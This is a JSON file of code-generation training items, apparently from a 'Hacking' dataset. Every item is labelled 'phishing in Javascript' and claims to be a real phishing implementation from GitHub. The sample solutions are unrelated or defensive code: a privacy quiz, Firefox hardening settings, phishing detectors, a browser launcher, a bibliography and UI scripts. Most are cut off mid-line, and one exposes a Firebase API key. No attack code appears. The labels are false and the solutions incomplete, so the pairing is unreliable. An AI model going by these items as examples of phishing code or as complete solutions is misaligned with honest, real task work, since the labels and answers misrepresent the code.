Hacking / code_dataset_20250522_220104.json
Basti1110's picture
Upload 4 files
36d694e verified
[
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/* Author: Selvahini Kamalarajan \r\nDate: December 5, 2023 \r\nFile Name: script \r\nDescription: Informational website about the implications of privacy and information technology usage *\/\r\n\r\nfunction phishing() {\r\n \/\/ Function to display correct answer for phishing email question\r\n var question = document.quiz2.question.value;\r\n\r\n if (question == \"yes\") {\r\n document.getElementById(\"message\").innerHTML = \"Correct! This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate.\";\r\n }\r\n\r\n if (question == \"no\") {\r\n document.getElementById(\"message\").innerHTML = \"Incorrect. This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate. Your privacy can be compromised due to malicious script activities.\";\r\n }\r\n document.getElementById(\"after_submit\").style.visibility = \"visible\"; \/\/Set element visibility to visible \r\n}\r\n\r\nfunction check() {\r\n \/\/ Function to check answers for Privacy Policy Question\r\n var question = document.quiz.question.value;\r\n\r\n \/\/ Output message and picture if user answers yes\/no\r\n if (question == \"yes\") {\r\n document.getElementById(\"message\").innerHTML = \"Nice! You are one of 9% of people who read privacy policies often.\";\r\n document.getElementById(\"picture\").src = \"policy.png\";\r\n }\r\n\r\n if (question == \"no\") {\r\n document.getElementById(\"message\").innerHTML = \"Just like you, 91% of consumers accept the terms and conditions without reading them.\";\r\n document.getElementById(\"picture\").src = \"policies-stats.jpg\";\r\n }\r\n document.getElementById(\"after_submit\").style.visibility = \"visible\";\r\n}\r\n\r\nfunction checkAns() {\r\n \/\/ Function to check answers for quiz \r\n var correctAns = [\"b\", \"b\", \"a\", \"d\", \"b\", \"d\", \"b\", \"b\", \"c\", \"d\"]; \r\n\r\n var correct = 0;\r\n \r\n var questions = [document.quiz.q1.value, document.quiz.q2.value, document.quiz.q3.value, documen",
"language":"Javascript",
"repo_name":"selvxhini-10\/PersonalPrivacyWebsite",
"timestamp":"2025-05-22T22:01:00.115247",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/\/\n\/******************************************************************************\n * user.js *\n * https:\/\/github.com\/pyllyukko\/user.js *\n ******************************************************************************\/\n\n\/******************************************************************************\n * SECTION: HTML5 \/ APIs \/ DOM *\n ******************************************************************************\/\n\n\/\/ PREF: Disable Service Workers\n\/\/ https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/Worker\n\/\/ https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/ServiceWorker_API\n\/\/ https:\/\/wiki.mozilla.org\/Firefox\/Push_Notifications#Service_Workers\n\/\/ NOTICE: Disabling ServiceWorkers breaks functionality on some sites (Google Street View...)\n\/\/ NOTICE: Disabling ServiceWorkers breaks Firefox Sync\n\/\/ Unknown security implications\n\/\/ CVE-2016-5259, CVE-2016-2812, CVE-2016-1949, CVE-2016-5287 (fixed)\nuser_pref(\"dom.serviceWorkers.enabled\",\t\t\t\tfalse);\n\n\/\/ PREF: Disable web notifications\n\/\/ https:\/\/support.mozilla.org\/en-US\/questions\/1140439\nuser_pref(\"dom.webnotifications.enabled\",\t\t\tfalse);\n\n\/\/ PREF: Disable DOM timing API\n\/\/ https:\/\/wiki.mozilla.org\/Security\/Reviews\/Firefox\/NavigationTimingAPI\n\/\/ https:\/\/www.w3.org\/TR\/navigation-timing\/#privacy\n\/\/ NOTICE: Disabling DOM timing API breaks item pages in AliExpress (https:\/\/github.com\/pyllyukko\/user.js\/issues\/561)\nuser_pref(\"dom.enable_performance\",\t\t\t\tfalse);\n\n\/\/ PREF: Disable resource timing API\n\/\/ https:\/\/www.w3.org\/TR\/resource-timing\/#privacy-security\n\/\/ NOTICE: Disabling resource timing API breaks some DDoS protection pages (Cloudflare)\nuser_pref(\"dom.enable_resource_timing\",\t\t\t\tfalse);\n\n\/\/ PREF: Make sure the User Timing API does not provide a new high resolution timestamp\n\/\/ https:\/\/trac.torproject.org\/projects\/tor\/ticket\/16336\n\/\/ https:\/\/www.w3.org\/TR\/2013\/REC-user-timing-2",
"language":"Javascript",
"repo_name":"pyllyukko\/user.js",
"timestamp":"2025-05-22T22:01:00.249678",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"export class PhishingDetector {\n constructor() {\n \/\/ No need to check for ai.languageModel here\n \/\/ We'll handle capability checks when we use the model\n }\n\n async calculateScore(emailContent) {\n try {\n \/\/ Log emailContent for debugging\n console.log('Email content received:', emailContent);\n\n const features = this.analyzeEmailFeatures(emailContent);\n\n \/\/ Check if the language model is available\n const capabilities = await ai.languageModel.capabilities();\n\n if (capabilities.available !== \"readily\") {\n console.warn('Language model is not readily available');\n\n if (capabilities.consent === \"granted\") {\n console.log('Consent already granted.');\n } else if (capabilities.consent === \"requirable\") {\n \/\/ Request user consent\n const consentResult = await ai.languageModel.requestConsent();\n if (!consentResult) {\n console.warn('User did not grant consent');\n return 50; \/\/ Return a default score or handle accordingly\n } else {\n console.log('User granted consent.');\n }\n } else {\n console.warn('Consent is not available.');\n return 50; \/\/ Return a default score or handle accordingly\n }\n }\n\n \/\/ Generate the prompt\n const prompt = `\n \nInstructions:\n- Considering the above information, assign a phishing likelihood score and provide a detailed explanation.\n- Use English and Arabic numerals.\n- Return the result in the format \"The score is the following: X\", where X is a number between 0 and 100.\nAnalyze this email for phishing indicators and provide a response in the following format:\n\nThe score is the following: X\n\nThe explanation is: [Your detailed analysis here]\nEnd of explanation.\n\nConsider these factors:\n- Urgency or pressure tactics\n- Grammar and spelling errors\n- Suspicious links or attachments\n- Requests for sensitive information\n- Mismatched or fake sender addresses\n- Time sent ",
"language":"Javascript",
"repo_name":"Dalosuuu\/GmailPhishGuardian_AI",
"timestamp":"2025-05-22T22:01:00.434292",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"'use strict'\n\nconst chromeLauncher = require('chrome-launcher')\nconst path = require('path')\n\n\/\/ Borrow from here:\n\/\/ https:\/\/github.com\/GoogleChrome\/puppeteer\/blob\/master\/lib\/Launcher.js#L30\nconst DEFAULT_ARGS = [\n '--disable-background-networking',\n '--disable-background-timer-throttling',\n '--disable-client-side-phishing-detection',\n '--disable-default-apps',\n '--disable-hang-monitor',\n '--disable-popup-blocking',\n '--disable-prompt-on-repost',\n '--disable-sync',\n '--enable-automation',\n '--enable-devtools-experiments',\n '--metrics-recording-only',\n '--no-first-run',\n '--password-store=basic',\n '--safebrowsing-disable-auto-update',\n '--use-mock-keychain',\n]\n\n\/\/ borrow from: http:\/\/qiita.com\/saekis\/items\/c2b41cd8940923863791\nfunction escapeHtml (string) {\n if (typeof string !== 'string') {\n return string\n }\n return string.replace(\/[&'`\"<>]\/g, function (match) {\n return {\n '&': '&amp;',\n '\\'': '&#x27;',\n '`': '&#x60;',\n '\"': '&quot;',\n '<': '&lt;',\n '>': '&gt;',\n }[match]\n })\n}\n\nfunction escapeSingleQuote (string) {\n if (typeof string !== 'string') {\n return string\n }\n return string.replace(\/'\/g, '\\\\\\'')\n}\n\nfunction escapeNewLine (string) {\n return string.replace(\/\\r?\\n\/g, '\\\\n')\n}\n\nasync function createChromeLauncher (startingUrl, options) {\n const flags = [].concat(DEFAULT_ARGS)\n let chromeInstance\n\n \/\/ Lighthouse adds '--disable-setuid-sandbox' flag automatically.\n \/\/ The flag causes an error on linux when staring headless chrome.\n \/\/ '--no-sandbox' suppresses an error caused by '--disable-setuid-sandbox'.\n if (process.platform === 'linux') {\n flags.push('--no-sandbox')\n }\n if (!options.visible) {\n flags.push('--headless')\n flags.push('--hide-scrollbars')\n flags.push('--mute-audio')\n }\n if (options.chromeFlags && Array.isArray(options.chromeFlags)) {\n options.chromeFlags.forEach(f => {\n if (f.indexOf('--') === -1) {\n throw new Error('An item of chromFlags option",
"language":"Javascript",
"repo_name":"OnetapInc\/chromy",
"timestamp":"2025-05-22T22:01:00.573851",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/\/ eslint-disable-next-line no-undef\ndocute.init({\n debug: true,\n title: 'Spam Scanner',\n repo: 'spamscanner\/spamscanner',\n 'edit-link': 'https:\/\/github.com\/spamscanner\/spamscanner\/tree\/master\/',\n twitter: 'niftylettuce',\n nav: {\n default: [\n {\n title:\n 'The best anti-spam, email filtering, and phishing prevention service.',\n path: '\/'\n }\n ]\n },\n \/\/ eslint-disable-next-line no-undef\n plugins: [docuteEmojify()]\n});\n",
"language":"Javascript",
"repo_name":"spamscanner\/spamscanner",
"timestamp":"2025-05-22T22:01:00.710474",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\n\n\/\/ this is the code which will be injected into a given page...\nvar config = {\n apiKey: \"AIzaSyD1FfiwIWzbbn0rhqQg6ZF2KzVBOiqU7oQ\",\n authDomain: \"phish-ai-production.firebaseapp.com\",\n databaseURL: \"https:\/\/phish-ai-production.firebaseio.com\",\n projectId: \"phish-ai-production\",\n storageBucket: \"gs:\/\/phish-ai-production.appspot.com\/\",\n messagingSenderId: \"976092427021\"\n};\nfirebase.initializeApp(config);\nvar db = firebase.firestore();\n\n\nfunction open_options_page() {\n chrome.tabs.create({'url': \"\/options.html\" } )\n};\n\nfunction open_demo_page() {\n chrome.tabs.create({'url': \"https:\/\/www.phish.ai\/request-a-demo\" } )\n};\n\nfunction restore_popup() {\n chrome.storage.local.get({\n idnEnable: true,\n aiEnable: true\n }, function(items) {\n if (!items.aiEnable) {\n document.getElementById('zero_day_disabled').style.display = \"\"\n }\n if (!items.idnEnable) {\n document.getElementById('idn_disabled').style.display = \"\"\n }\n var bg = chrome.extension.getBackgroundPage();\n var query = {active: true, currentWindow: true};\n chrome.tabs.query(query, function callback(tabs) {\n if (items.idnEnable) {\n var currentTab = tabs[0]; \/\/ there will be only one in this array\n var hostname = bg.extractHostname(currentTab.url);\n var domain = document.getElementById('domain');\n var idn_status = document.getElementById('idn_status');\n if (bg.isDomainIDN(hostname)) {\n domain.className = 'badge badge-danger';\n idn_status.className = 'badge badge-danger';\n idn_status.innerHTML = 'IDN Detected';\n }\n domain.innerHTML = hostname;\n }\n\n if (items.aiEnable) {\n if (currentTab.id in bg.tabMalicious) {\n var zero_day = document.getElementById('zero_day');\n var ta",
"language":"Javascript",
"repo_name":"phishai\/phish-protect",
"timestamp":"2025-05-22T22:01:00.830022",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"respecConfig.localBiblio = {\n\t\"aicaptcha\": {\n\t\t\"title\": \"aiCaptcha: Using AI to beat CAPTCHA and post comment spam\",\n\t\t\"date\": \"\",\n\t\t\"authors\": [\"Casey Chesnut\"],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"\",\n\t\t\"href\": \"http:\/\/www.brains-n-brawn.com\/default.aspx?vDir=aicaptcha\"\n\t},\n\n \"able-gamers\": {\n \"title\": \"Thought On Accessibility and VR\",\n \"date\": \"March, 2017\",\n \"authors\": [\"AJ Ryan\"],\n \"editors\": [],\n \"etAl\": false,\n \"publisher\": \"\",\n \"href\": \"https:\/\/ablegamers.org\/thoughts-on-accessibility-and-vr\/\"\n },\n\n\t\"antiphishing\": {\n\t\t\"title\": \"Phishing Activity Trends Report\",\n\t\t\"date\": \"July, 2005\",\n\t\t\"authors\": [],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"Anti-Phishing Working Group\",\n\t\t\"href\": \"http:\/\/antiphishing.org\/APWG_Phishing_Activity_Report_Jul_05.pdf\"\n\t},\n\t\"breaking\": {\n\t\t\"title\": \"Breaking CAPTCHAs Without Using OCR\",\n\t\t\"date\": \"\",\n\t\t\"authors\": [\"Howard Yeend\"],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"\",\n\t\t\"href\": \"http:\/\/www.cs.berkeley.edu\/%7Emori\/gimpy\/gimpy.html\"\n\t},\n\t\"breakingocr\": {\n\t\t\"title\": \"Breaking CAPTCHAs Without Using OCR\",\n\t\t\"date\": \"\",\n\t\t\"authors\": [\"Howard Yeend\"],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"\",\n\t\t\"href\": \"http:\/\/www.puremango.co.uk\/cm_breaking_captcha_115.php\"\n\t},\n\t\"chafee\": {\n\t\t\"title\": \"17 USC 121, Limitations on exclusive rights: reproduction for blind or other people with disabilities (also known as the Chafee Amendment)\",\n\t\t\"date\": \"\",\n\t\t\"authors\": [],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"\",\n\t\t\"href\": \"https:\/\/www.copyright.gov\/title17\/92chap1.html\"\n\t},\n \"captcha-ocr\": {\n\t\"title\": \"CAPTCHA: Attacks and Weaknesses against OCR technology\",\n\t\"date\": \"2013\",\n\t\"authors\": [\n\t \"Silky Azad\", \"Kiran Jain\"],\n\t\"publisher\": \"Journal of Computer science and Technology\",\n\t\"etAl\": false,\n\t\"editors\": [],\n\t\"href\": \"https:\/\/computerresearch.org\/index.php\/computer\/article\/download\/368\/368\"\n },\n \"information-security\": {\n\t\"ti",
"language":"Javascript",
"repo_name":"w3c\/apa",
"timestamp":"2025-05-22T22:01:01.006796",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"'use strict';\n\nconst fs = require('fs-extra');\nconst debug = require('debug')('app');\nconst express = require('express');\nconst csp = require('express-csp-header');\nconst frameguard = require('frameguard');\nconst xssFilter = require('x-xss-protection');\nconst bodyParser = require('body-parser');\nconst url = require('url');\nconst dateFormat = require('dateformat');\nconst {fork} = require('child_process');\nconst download = require('download-file');\nconst rimraf = require('rimraf');\nconst phishingDetector = require('eth-phishing-detect\/src\/detector');\nconst crypto = require(\"crypto\");\nconst request = require('request');\nconst app = express();\nconst config = require('.\/config');\nconst check = require('.\/_utils\/webcheck.js');\nconst lookup = require('.\/_utils\/lookup.js');\n\n\nlet default_template = fs.readFileSync('.\/_layouts\/default.html', 'utf8');\nlet cache;\nlet updating_now = false;\nlet icon_warnings = [];\nvar older_cache_time;\n\n\nif('perform_dns_lookup' in config && config.perform_dns_lookup === false) {\n default_template = default_template.replace(\"{{ config.perform_dns_lookup }}\", \"<div class='ui info message'>DNS lookups not performed due to configuration.<\/div><br \/>\");\n} else {\n default_template = default_template.replace(\"{{ config.perform_dns_lookup }}\", '');\n}\n\n\/* See if there's an up-to-date cache, otherwise run `update.js` to create one. *\/\nfunction getCache(callback = false) {\n if (!fs.existsSync('_cache\/cache.json')) {\n debug(\"No cache file found. Creating one...\");\n if (callback) {\n if (!updating_now) {\n updating_now = true;\n fork('update.js');\n }\n var checkDone = setInterval(function() {\n if (fs.existsSync('_cache\/cache.json')) {\n updating_now = false;\n cache = JSON.parse(fs.readFileSync('_cache\/cache.json'));\n clearInterval(checkDone);\n debug(\"Successfully updated cache!\");\n ",
"language":"Javascript",
"repo_name":"MrLuit\/EtherScamDB",
"timestamp":"2025-05-22T22:01:01.099275",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/**\n * Github\n * https:\/\/github.com\/6IX7ine\/certstreamcatcher\n * \n * Copyright (c) 2017 F\u00e1bio Castro\n * Licensed under the MIT license.\n *\/\n\n 'use strict'\n\n const tld = require('tldjs');\n const lodash = require('lodash');\n const color = require('cli-color');\n const status = require('node-status');\n const punycode = require('punycode');\n\n const yellow = color.yellow.underline;\n const danger = color.redBright.underline;\n const white = color.white.underline;\n\n const certificates = status.addItem('certificates');\n\n const mapping = {\n\n \"a\": [\"\u00e0\", \"\u00e1\", \"\u00e2\", \"\u00e3\", \"\u00e4\", \"\u00e5\", \"\u0101\", \"\u0103\", \"\u0105\", \"\u01ce\", \"\u0201\", \"\u0203\", \"\u0227\", \"\u1e01\", \"\u1e9a\", \"\u1ea1\"],\n \"b\": [\"\u1e03\", \"\u1e05\", \"\u1e07\", \"\u0180\"],\n \"c\": [\"\u00e7\", \"\u0107\", \"\u0109\", \"\u010b\", \"\u010d\"],\n \"d\": [\"\u1e0b\", \"\u1e0d\", \"\u1e0f\", \"\u1e11\", \"\u1e13\", \"\u0111\"],\n \"e\": [\"\u00e8\", \"\u00e9\", \"\u00ea\", \"\u00eb\", \"\u0115\", \"\u0117\", \"\u0119\", \"\u011b\", \"\u0205\", \"\u0207\", \"\u0229\", \"\u1e19\", \"\u1e1b\", \"\u1eb9\", \"\u1ebd\"],\n \"f\": [\"\u1e1f\"],\n \"g\": [\"\u011d\", \"\u011f\", \"\u0121\", \"\u0123\", \"\u01e7\", \"\u01f5\", \"\u1e21\"],\n \"h\": [\"\u0125\", \"\u021f\", \"\u1e23\", \"\u1e25\", \"\u1e27\", \"\u1e29\", \"\u1e2b\", \"\u1e96\"],\n \"i\": [\"\u00ec\", \"\u00ed\", \"\u00ee\", \"\u00ef\", \"\u0129\", \"\u012b\", \"\u012d\", \"\u012f\", \"\u01d0\", \"\u0209\", \"\u020b\", \"\u1e2d\", \"\u1ecb\"],\n \"j\": [\"\u0135\", \"\u01f0\"],\n \"k\": [\"\u0137\", \"\u01e9\", \"\u1e31\", \"\u1e33\", \"\u1e35\"],\n \"l\": [\"\u013a\", \"\u013c\", \"\u013e\", \"\u0140\", \"\u1e37\", \"\u1e3b\", \"\u1e3d\", \"\u03b9\", \"\u0142\"],\n \"m\": [\"\u1e3f\", \"\u1e41\", \"\u1e43\", \"\u03fb\"],\n \"n\": [\"\u00f1\", \"\u0144\", \"\u0146\", \"\u0148\", \"\u0149\", \"\u01f9\", \"\u1e45\", \"\u1e47\", \"\u1e49\", \"\u1e4b\"],\n \"o\": [\"\u00f2\", \"\u00f3\", \"\u00f4\", \"\u00f5\", \"\u00f6\", \"\u014d\", \"\u014f\", \"\u0151\", \"\u01a1\", \"\u01d2\", \"\u01eb\", \"\u1ed1\", \"\u020d\", \"\u020f\", \"\u022f\", \"\u1ecd\", \"\u00f8\", \"\u1ed9\"],\n \"p\": [\"\u1e55\", \"\u1e57\", \"\u03f8\"],\n \"r\": [\"\u0155\", \"\u0157\", \"\u0159\", \"\u0211\", \"\u0213\", \"\u1e59\", \"\u1e5b\", \"\u1e5f\", \"\u0491\"],\n \"s\": [\"\u015d\", \"\u015f\", \"\u0161\", \"\u0219\", \"\u1e61\", \"\u1e63\"],\n \"t\": [\"\u0163\", \"\u0165\", \"\u021b\", \"\u1e6b\", \"\u1e6d\", \"\u1e6f\", \"\u1e71\", \"\u1e97\"],\n \"u\": [\"\u00f9\", \"\u00fa\", \"\u00fb\", \"\u00fc\", \"\u0169\", \"\u016b\", \"\u016d\", \"\u016f\", \"\u0171\", \"\u0173\", \"\u01b0\", \"\u01d4\", \"\u0215\", \"\u0217\", \"\u1e73\", \"\u1e75\", \"\u1e77\", \"\u1ee5\"],\n \"v\": [\"\u1e7d\", \"\u1e7f\"],\n \"w\": [\"\u0175\", \"\u1e81\", \"\u1e83\", \"\u1e85\", \"\u1e87\", \"\u1e89\", \"\u1e98\"],\n \"x\": [\"\u1e8b\", \"\u1e8d\"],\n \"y\": [\"\u00fd\", \"\u00ff\", \"\u0177\", \"\u0233\", \"\u1e8f\", \"\u1e99\", \"\u1ef3\", \"\u1ef5\", \"\u1ef9\"],\n \"z\": [\"\u017a\", \"\u017c\", \"\u017e\", \"\u1e91\", \"\u1e93\", \"\u1e95\"]\n}\n\n module.exports = {\n\n \tcertstreamClientPhishing: function (certstream, regex, tlds, options) {\n\n \t\tthis.certstream = certstream;\n \t\tthis.regex = regex;\n \t\tthis.tlds = tlds;\n\n\n \t\tlet settings = { tlds: false };\n\n \t\tif (!op",
"language":"Javascript",
"repo_name":"jimywork\/certstreamcatcher",
"timestamp":"2025-05-22T22:01:01.244357",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/\/ Redirecting to links from the book:\n\/\/ https:\/\/nooffice.link\/REDIRECT\n\/\/ which translates to https:\/\/nooffice.org\/redirect?to=REDIRECT\n\nlet links = new Map([\n\n\/\/list of REDIRECT links\n['nooffice', 'https:\/\/nooffice.org'],\n\n\n\/\/chapter 19\n['ocr', 'https:\/\/en.wikipedia.org\/wiki\/Optical_character_recognition'],\n['evernote','https:\/\/Evernote.com'],\n['swiftscan', 'https:\/\/swiftscan.app\/en\/index.html'],\n['ios-scan', 'https:\/\/support.apple.com\/en-us\/HT210336'],\n['dropbox', 'https:\/\/www.dropbox.com'],\n['box', 'https:\/\/box.com'],\n['gdrive', 'https:\/\/drive.google.com'],\n['onedrive', 'https:\/\/www.microsoft.com\/en-us\/microsoft-365\/onedrive\/online-cloud-storage'],\n['iwork', 'https:\/\/www.apple.com\/iwork\/'],\n['gsheets', 'https:\/\/www.google.com\/sheets\/about\/'],\n['excel', 'https:\/\/www.microsoft.com\/en-us\/microsoft-365\/excel'],\n['mfa', 'https:\/\/en.wikipedia.org\/wiki\/Multi-factor_authentication'],\n['messages', 'https:\/\/support.apple.com\/explore\/messages'],\n['signal', 'https:\/\/www.signal.org'],\n['telegram', 'https:\/\/telegram.org'],\n['whatsapp', 'https:\/\/www.whatsapp.com'],\n['ipadonly', 'https:\/\/ipadonly.com\/book\/'],\n['vpn', 'https:\/\/en.wikipedia.org\/wiki\/Virtual_private_network'],\n['github', 'https:\/\/nooffice.org\/why-in-any-company-you-should-be-using-version-control-for-anything-how-we-use-github-not-only-bc2554308455\/'],\n\n\/\/chapter 20\n\n['conversation', 'https:\/\/en.wikipedia.org\/wiki\/A_Little_Less_Conversation'],\n['slack', 'https:\/\/slack.com'],\n['msteams', 'https:\/\/www.microsoft.com\/en-us\/microsoft-365\/microsoft-teams\/group-chat-software'],\n['cognitive', 'https:\/\/www.pnas.org\/content\/106\/37\/15583'], \n['digital-minimalism', 'https:\/\/www.calnewport.com\/books\/digital-minimalism\/'],\n\n\/\/chapter 21\n['offices', 'https:\/\/sliwinski.com\/tag\/office'],\n['cabinet', 'https:\/\/sliwinski.com\/declutter-your-desk-why-i-love-my-clutter-fre\/'],\n['stand', 'https:\/\/michael.team\/myoffice\/'],\n['whiteboard', 'https:\/\/sliwinski.com\/whiteboard\/'],\n\n\/\/chapter 22\n\n\n\/\/chapter 23\n['basecamphires', 'https:\/\/m.signa",
"language":"Javascript",
"repo_name":"Nozbe\/NoOffice.org",
"timestamp":"2025-05-22T22:01:01.359520",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/* OpenID for node.js\n *\n * http:\/\/ox.no\/software\/node-openid\n * http:\/\/github.com\/havard\/node-openid\n *\n * Copyright (C) 2010 by H\u00e5vard Stranden\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and\/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n *\n * -*- Mode: JS; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- \n * vim: set sw=2 ts=2 et tw=80 : \n *\/\n\nconst { access } = require('fs');\n\nvar Buffer = require('buffer').Buffer,\n crypto = require('crypto'),\n http = require('.\/http'),\n querystring = require('querystring'),\n url = require('url'),\n xrds = require('.\/lib\/xrds');\n\nvar _associations = {};\nvar _discoveries = {};\nvar _nonces = {};\n\nvar AX_MAX_VALUES_COUNT = 1000;\n\nvar openid = exports;\n\nvar _get = http.get;\nvar _post = http.post;\n\nfunction hasOwnProperty(obj, prop) {\n return Object.prototype.hasOwnProperty.call(obj, prop);\n}\n\nopenid.RelyingParty = function (returnUrl, realm, stateless, strict, extensions) {\n this.returnUrl = returnUrl;\n this.realm = realm || null;\n this.stateless = stateless;\n this.str",
"language":"Javascript",
"repo_name":"havard\/node-openid",
"timestamp":"2025-05-22T22:01:01.483356",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/\/If container already in DOM, remove it\nif(report.length > 0) report.remove();\n\n\/\/Container report\n\/*report = $('<div id=\"report\">\\\n\t\t\t<textarea id=\"reportv\" maxlength=\"150\" placeholder=\"Attention, les signalements abusifs, sans int\u00e9r\u00eat ou encore pour dire merci seront passible de sanction allant d\\'un simple avertissement au ban.\"><\/textarea>\\\n\t\t\t<\/div>');*\/\n\n\t\n\tbody.append('<div id=report> <\/div>');\n\t\n\treport = cacheSel('#report');\n\t\n\t\/\/Container, select subject \/ textarea \n\treport.html('<p>Selectionner le sujet de votre signalement<\/p>\\\n\t\t\t\t<ul>\\\n\t\t\t\t\t <li id=reDead><i class=\"fa fa-unlink\"> Liens morts<\/i><\/li>\\\n\t\t\t\t\t <li id=reForb><i class=\"fa fa-ban\"> Hors charte<\/i><\/li>\\\n\t\t\t\t\t <li id=reMove><i class=\"fa fa-share\"> A d\u00e9placer<\/i><\/li>\\\n\t\t\t\t\t <li id=reSecu><i class=\"fa fa-crosshairs\"> Virus\/Trojan\/Scam...<\/i><\/li>\\\n\t\t\t\t\t <li id=reHate><i class=\"fa fa-globe\"> Insulte envers un peuple\/religion\/minorit\u00e9...<\/i><\/li>\\\n\t\t\t\t\t <li id=rePers><i class=\"fa fa-eye-slash\"> Violation vie priv\u00e9e<\/i><\/li>\\\n\t\t\t\t\t <li id=reProt><i class=\"fa fa-child\"> Contenu p\u00e9dophile<\/i><\/li>\\\n\t\t\t\t\t <li id=reOthr><i class=\"fa fa-random\"> R\u00e9ouverture, r\u00e9solu, autres...<\/i><\/li>\\\n\t\t\t\t<\/ul>\\\n\t\t\t\t<textarea id=reportv placeholder=\"default\"><\/textarea>');\n\t\n\t\/\/Refresh caching\n\treport = cacheSel('#report');\n\treportv = cacheSel('#reportv');\n\t\n\t\/\/Hide the reportv until a subject get select\n\treportv.hide();\n\n\t\/\/Get 80% in px\n\tvar sizecal = $(window).width() * 0.8;\n\t\n\t\/\/Max width\n\tif(parseInt(sizecal) > 600) var sizecal = 600;\n\n\t\/\/Pop the container vote\n\treport.dialog({\n\t\twidth:sizecal,\n\t\tmodal:true,\n\t\tresizable: true,\n\t\ttitle:'Signalement',\n\t\tdialogClass:'modalNinja',\n\t\tshow:{effect:'scale', duration: 320},\n\t\tbuttons: [{\n\t\t\ttext: 'Confirmation',\n\t\t\tclick: function() {\n\n\t\t\t\t\/\/Subject \n\t\t\t\treps = reportv.attr('class'); \n\t\t\t\t\t\n\t\t\t\t\/\/Value textarea\n\t\t\t\trept = reportv.val();\n\t\t\t\t\n\t\t\t\t\/\/Less 10 chars return\n\t\t\t\tif(rept.length < 10) {\n\t\t\t\t\tcoloredInput(reportv,'errorSe','Minimum 10 caract\u00e8res');\n\t\t\t\t\treturn;\n",
"language":"Javascript",
"repo_name":"Anyon3\/ninjacms",
"timestamp":"2025-05-22T22:01:01.680023",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/**\n * Created by IntelliJ IDEA.\n * User: Altryne\n * Date: Nov 20, 2010\n * Time: 4:55:41 AM\n * To change this template use File | Settings | File Templates.\n *\/\n\nvar intervall = 0;\n can_run_apps = false,\n folder_open = false,\n tick = '',\n doubleclickthreshhold = 200,\n isDblClick = false,\n canScroll = true,\n active_app = '';\n\n$('.page .delete,#dock .delete').live('click', function(event) {\n event.stopPropagation();\n event.stopImmediatePropagation();\n if(confirm('Are you sure you want to delete this app from you iPad?')){\n $(this).parent().css({'width':74,'height':99}).children('.delete, span').hide();\n $(this).siblings('.app_logo')\n .stop()\n .css('position','absolute')\n .animate({left:\"50%\",width:1,top:\"50%\",height: 1},'easeInQuint',function(){$(this).parent().remove()})\n }\n});\n$('#multitask_bar .delete').live('mousedown ', function(event) {\n event.stopPropagation();\n event.stopImmediatePropagation();\n $(this).parent().css({'width':74,'height':99}).children('.delete, span').hide();\n $(this).siblings('.app_logo')\n .stop()\n .css('position','absolute')\n .animate({left:\"50%\",width:1,top:\"50%\",height: 1},'easeInQuint',function(){\n _id = $(this).parent().attr('id');\n 